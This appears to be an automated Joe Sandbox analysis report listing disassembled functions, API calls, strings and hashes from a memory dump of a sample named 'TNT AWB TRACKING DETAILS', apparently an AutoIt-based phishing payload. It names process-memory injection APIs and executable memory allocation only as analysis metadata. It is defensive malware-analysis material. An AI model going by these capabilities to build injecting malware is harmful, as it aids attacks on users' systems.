Function 00AB2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00AC0DB6: std::exception::exception.LIBCMT ref: 00AC0DEC
Part of subcall function 00AC0DB6: __CxxThrowException@8.LIBCMT ref: 00AC0E01

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

Part of subcall function 00AA7A51: _memmove.LIBCMT ref: 00AA7AAB

__swprintf.LIBCMT ref: 00AB2ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00AB2D66

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: cc7a5c021f503433567e6add077b82431c06d9cec7b9ec9a0d7faa56eec5e009
Instruction ID: 78fc13a4cd5a7027eb50d5f7833ebca53f124d18bcc5b895906e28fc5504a72c
Opcode Fuzzy Hash: cc7a5c021f503433567e6add077b82431c06d9cec7b9ec9a0d7faa56eec5e009
Instruction Fuzzy Hash: E3915C715082019FC714EF24C985EAFB7B8EF96750F00491EF4869B2A2EB30ED44CB52

Function 00B0B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA4743,?,?,00AA37AE,?), ref: 00AA4770

CoInitialize.OLE32(00000000), ref: 00B0B9BB
CoCreateInstance.OLE32(00B32D6C,00000000,00000001,00B32BDC,?), ref: 00B0B9D4
CoUninitialize.OLE32 ref: 00B0B9F1

Part of subcall function 00AA9837: __itow.LIBCMT ref: 00AA9862
Part of subcall function 00AA9837: __swprintf.LIBCMT ref: 00AA98AC

Strings

.lnk, xrefs: 00B0B99D, 00B0B9AB

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: a33d764b0c68f1b86a5e6c780a88ecbda4648c9129255e4075596c9e1785445c
Instruction ID: 1ee45eb33079a56464874ea7ebc7d322553d13c775eaea910be521e1ff83a42b
Opcode Fuzzy Hash: a33d764b0c68f1b86a5e6c780a88ecbda4648c9129255e4075596c9e1785445c
Instruction Fuzzy Hash: DBA158756043059FCB10DF14C984E6ABBE5FF8A314F148998F8999B3A1CB31ED46CB91

Function 00AC501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00AC50AD

Part of subcall function 00AD00F0: __87except.LIBCMT ref: 00AD012B

Strings

pow, xrefs: 00AC5085, 00AC50A2

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 03ffbbb11b459d598a0fa79460b2d696aa1a175a5bd1254984030cf8c8a9dd05
Instruction ID: 021d9dfe7b23a24f95bf0b51348d401a21ad4f632bf12c67233235cc0095c1f2
Opcode Fuzzy Hash: 03ffbbb11b459d598a0fa79460b2d696aa1a175a5bd1254984030cf8c8a9dd05
Instruction Fuzzy Hash: EB513971D096029ADB11B734C905FAE3BA4EB40710F248A5EF4D7C63A9EE349DC49A86

Function 00AB6192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AB6248
_memmove.LIBCMT ref: 00AB62E4
_memset.LIBCMT ref: 00AB6308

Strings

ERCP, xrefs: 00AB61B3

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: b311c43e4ab00e5d21b21c8fd8f9a37353e83d4e3445c9f8be183c9829fdd5cb
Instruction ID: fa22ee74635df6c466935725a234d11113d079ec60bb15395ea0b1db7ae35579
Opcode Fuzzy Hash: b311c43e4ab00e5d21b21c8fd8f9a37353e83d4e3445c9f8be183c9829fdd5cb
Instruction Fuzzy Hash: 2A517171900709DBEB24CF95C941BEAB7F8EF44314F20456EE94ADB252E774AA44CB40

Function 00AF97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B014BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AF9296,?,?,00000034,00000800,?,00000034), ref: 00B014E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00AF983F

Part of subcall function 00B01487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AF92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00B014B1

Part of subcall function 00B013DE: GetWindowThreadProcessId.USER32(?,?), ref: 00B01409
Part of subcall function 00B013DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00AF925A,00000034,?,?,00001004,00000000,00000000), ref: 00B01419
Part of subcall function 00B013DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00AF925A,00000034,?,?,00001004,00000000,00000000), ref: 00B0142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AF98AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AF98F9

Strings

@, xrefs: 00AF9911

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 56e5d586096efde7471c46990e14efb20807a0c775f301a8b0c78d60a8322866
Instruction ID: 4c370d227178ced2474fb090401d6e355b1d965daed1c7b901464902b3c0c736
Opcode Fuzzy Hash: 56e5d586096efde7471c46990e14efb20807a0c775f301a8b0c78d60a8322866
Instruction Fuzzy Hash: 0D414D7690021CBEDB14DFA4CC81EEEBBB8EB09300F104599FA55B7291DA706E45CBA0

Function 00B27946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B2F910,00000000,?,?,?,?), ref: 00B279DF
GetWindowLongW.USER32 ref: 00B279FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B27A0C

Strings

SysTreeView32, xrefs: 00B279B1

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 2ff06ff83c5b25bed574626552e5485d57f9b4c4d2a28ad140bbb189ccaa9e75
Instruction ID: 4afa69146a2ed7503a3a7bad3470cf41692d23ecee67ad8febc9674f4a3489e4
Opcode Fuzzy Hash: 2ff06ff83c5b25bed574626552e5485d57f9b4c4d2a28ad140bbb189ccaa9e75
Instruction Fuzzy Hash: A231A031244216ABDB118E38DC45BEA77A9FB0A334F204725F879A31E0DB31ED918B54

Function 00B273D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B27461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B27475
SendMessageW.USER32(?,00001002,00000000,?), ref: 00B27499

Strings

SysMonthCal32, xrefs: 00B2742C

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 3b1530be25aa53482341ffba441cadd16a4354f40e7efe25394f3e83bd433dbf
Instruction ID: f54dff7a559ee06631bd11b0689d8f7deb32aa38e7338710b74f0a8c04d65a8f
Opcode Fuzzy Hash: 3b1530be25aa53482341ffba441cadd16a4354f40e7efe25394f3e83bd433dbf
Instruction Fuzzy Hash: 6921F332540229BBDF219F54DC42FEA3BB9EF48724F110154FE186B1D0DAB5AC51CBA0

Function 00B27B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B27C4A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B27C58
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B27C5F

Strings

msctls_updown32, xrefs: 00B27BC4

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: f54fec5325aa2af09789ffb8c0befae42cfdbe17288cd1d15a8d505f5117be34
Instruction ID: ac966d9afa437e31182304a6bdb38e9985224e4b071c03dafa024fb87f31ec49
Opcode Fuzzy Hash: f54fec5325aa2af09789ffb8c0befae42cfdbe17288cd1d15a8d505f5117be34
Instruction Fuzzy Hash: 8F214AB5604219AFDB21DF28ECC1DA637EDEF5A354B140499FA059B3A1CB71EC11CBA0

Function 00B26CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B26D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B26D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B26D70

Strings

Listbox, xrefs: 00B26D08

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: b768242928a9ddf5fc9d19d532431cf33be3cb901df68e39316e173ab3e71e80
Instruction ID: 75e4430449064e0c9f8acd1db238f02e50837a8d51a25f99b48b4ba8a2a1f931
Opcode Fuzzy Hash: b768242928a9ddf5fc9d19d532431cf33be3cb901df68e39316e173ab3e71e80
Instruction Fuzzy Hash: 3C21A732610128BFDF119F54DC45FBB37BAEF89750F018174F9495B1A0CA719C5187A0

Function 00B2770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B27772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B27787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B27794

Strings

msctls_trackbar32, xrefs: 00B27749

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 3784149c1d29086620d194b4d7e5b36d98c53e5cce44d0e623a0b51b3ab672ab
Instruction ID: 25cd24e65c633be1c90c07cc6fa51b1c840abcf6194ccda5726ff2f362840107
Opcode Fuzzy Hash: 3784149c1d29086620d194b4d7e5b36d98c53e5cce44d0e623a0b51b3ab672ab
Instruction Fuzzy Hash: 5C113632240209BFEF209F60DC05FEB37A8EF89B54F010528FA45A60E0CA72EC11CB24

Function 00AA4C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00AA4B83,?), ref: 00AA4C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AA4C56

Strings

kernel32.dll, xrefs: 00AA4C3F
Wow64RevertWow64FsRedirection, xrefs: 00AA4C50

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: f73e724e2361d1859d7e9dfb4e191d6d3ff48be7d8224b7f55153bc6871f6b41
Instruction ID: 7c8608807c56ae40810fd5d69eec8f281f4f208d336ad5f58cad96fc2c1d4fb5
Opcode Fuzzy Hash: f73e724e2361d1859d7e9dfb4e191d6d3ff48be7d8224b7f55153bc6871f6b41
Instruction Fuzzy Hash: 35D01230550713CFD7305F31D90975676E4AF09753B51887DA499D71B0EBB0D480C651

Function 00AA4C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00AA4BD0,?,00AA4DEF,?,00B652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AA4C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AA4C23

Strings

kernel32.dll, xrefs: 00AA4C0C
Wow64DisableWow64FsRedirection, xrefs: 00AA4C1D

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 040b91048cf9b9bf6747fbf9f3c7dfe2a3ede17a4678e00f242cdcfbb056a331
Instruction ID: a96e49dc0cdc35bff353a35d60d8f4d358790fda1fe0b45020a28b5430d3d280
Opcode Fuzzy Hash: 040b91048cf9b9bf6747fbf9f3c7dfe2a3ede17a4678e00f242cdcfbb056a331
Instruction Fuzzy Hash: 27D0EC30511713CFD7206F71D908756B6E5EF09752B518879A48AD71A0EBB0D481C650

Function 00B20DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00B21039), ref: 00B20DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B20E07

Strings

advapi32.dll, xrefs: 00B20DF0
RegDeleteKeyExW, xrefs: 00B20E01

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: a52a916ec8587662921a9c3dc9d01e7e3c1902e5aa9ec6a37dafd9e065224caf
Instruction ID: e06abc18f1fa7ef2ca3d60ffa772503a76f6344dfe2aba29595f194147585358
Opcode Fuzzy Hash: a52a916ec8587662921a9c3dc9d01e7e3c1902e5aa9ec6a37dafd9e065224caf
Instruction Fuzzy Hash: 8FD0EC70910723CFD7206B75E808796B6E5AF14753F518CBE9986E2161EAB4D8A0C650

Function 00B190E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00B18CF4,?,00B2F910), ref: 00B190EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00B19100

Strings

kernel32.dll, xrefs: 00B190E9
GetModuleHandleExW, xrefs: 00B190FA

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 7e10bd1cc9f471313a26b52b66e5f63264b572b2952366bc51910c331b7716aa
Instruction ID: 4f88d4a58cb62513beb87d04cd6ae2605843ef76b94ee1a97b7ea1b85ce95f4c
Opcode Fuzzy Hash: 7e10bd1cc9f471313a26b52b66e5f63264b572b2952366bc51910c331b7716aa
Instruction Fuzzy Hash: 65D01234510713EFE7209F31D81D75676E5EF05752B558CB99485E7560EA70C4D0C650

Function 00AE1714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00AE1718
__swprintf.LIBCMT ref: 00AE1749

Strings

WIN_XPe, xrefs: 00AE1788
%.3d, xrefs: 00AE1723

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 932538e9c0d50e82f3bd1fc0bcdcc3897281729a2085abfbd0ecbc56e04c4c74
Instruction ID: 02756106ff2c34507e3fb3774975b01b44a3eb81323e1c02d4bb608b222dc687
Opcode Fuzzy Hash: 932538e9c0d50e82f3bd1fc0bcdcc3897281729a2085abfbd0ecbc56e04c4c74
Instruction Fuzzy Hash: FDD012718041A9FBCB1497919889DBD77BCA709712F101462B402A2140E2358794DE21

Function 00AF717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eef3e53ee2302b32f251418c8334fcf3634f3fd590ed15d9468c540d9186dd6
Instruction ID: 68c20efa1287363b7250339d16156a47ce2b1a2ae07e2b00767dde33872b5d50
Opcode Fuzzy Hash: 4eef3e53ee2302b32f251418c8334fcf3634f3fd590ed15d9468c540d9186dd6
Instruction Fuzzy Hash: E5C12675A0421AEFCB14CFA8C884EAEBBB5FF48714B158598F905EB251D730ED81DB90

Function 00B1E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00B1E0BE
CharLowerBuffW.USER32(?,?), ref: 00B1E101

Part of subcall function 00B1D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00B1D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00B1E301
_memmove.LIBCMT ref: 00B1E314

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

